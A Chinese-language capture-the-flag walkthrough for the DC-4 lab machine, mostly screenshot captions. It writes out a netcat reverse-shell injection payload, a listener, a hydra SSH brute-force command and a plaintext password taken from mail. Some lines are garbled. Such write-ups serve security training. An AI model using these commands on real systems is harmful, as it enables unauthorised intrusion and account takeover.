入侵靶机DC-4

1.主机扫描

入侵靶机DC-4_第1张图片

2.端口扫描

入侵靶机DC-4_第2张图片

3.测试访问web服务器页面

入侵靶机DC-4_第3张图片

4.尝试爆破web登录界面

cd /usr/share/john/

cp password.ist ~/Desktop

入侵靶机DC-4_第4张图片

入侵靶机DC-4_第5张图片

入侵靶机DC-4_第6张图片

5.抓取命令包

入侵靶机DC-4_第7张图片

7.执行命令反弹shell

nc+10.3.139.75+666+-e+/bin/bashls

sudo nc -lvvp 666

python -c ‘import pty;pty.spawn("/bin/sh")’
 

入侵靶机DC-4_第8张图片

入侵靶机DC-4_第9张图片

8.查看用户

入侵靶机DC-4_第10张图片

入侵靶机DC-4_第11张图片

9.根据提示密码本破解家目录下的所有用户

hydra -L user.txt -P pass.txt ssh://10.3.139.72

入侵靶机DC-4_第12张图片

入侵靶机DC-4_第13张图片

10.SSH登录jim用户

入侵靶机DC-4_第14张图片

入侵靶机DC-4_第15张图片

cd /var/mail/

入侵靶机DC-4_第16张图片

11.根据邮件上的密码登录charles用户

ssh [email protected]
Password is:  ^xHhA&hvim0y

入侵靶机DC-4_第17张图片

12.切到wxk用户  获得root权限

入侵靶机DC-4_第18张图片

13.切到root目录下,查看flag 

入侵靶机DC-4_第19张图片

你可能感兴趣的:(DC-1-9通关秘籍)